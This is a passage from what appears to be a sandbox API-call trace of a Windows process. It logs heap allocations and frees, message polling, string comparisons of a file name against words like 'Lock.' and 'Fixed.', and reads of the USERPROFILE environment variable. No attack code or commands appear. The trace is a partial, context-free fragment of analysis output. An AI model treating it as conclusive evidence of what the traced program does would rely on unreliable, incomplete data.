(Locale=0x400, dwCmpFlags=0x1, lpString1="Vw ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.533] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D7Vw ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Vw ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ag.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0209.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69c10 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.535] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.535] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0209.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.536] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.536] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0209.537] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.538] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0209.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.540] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.540] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0209.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0209.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.542] RtlAllocateHeap 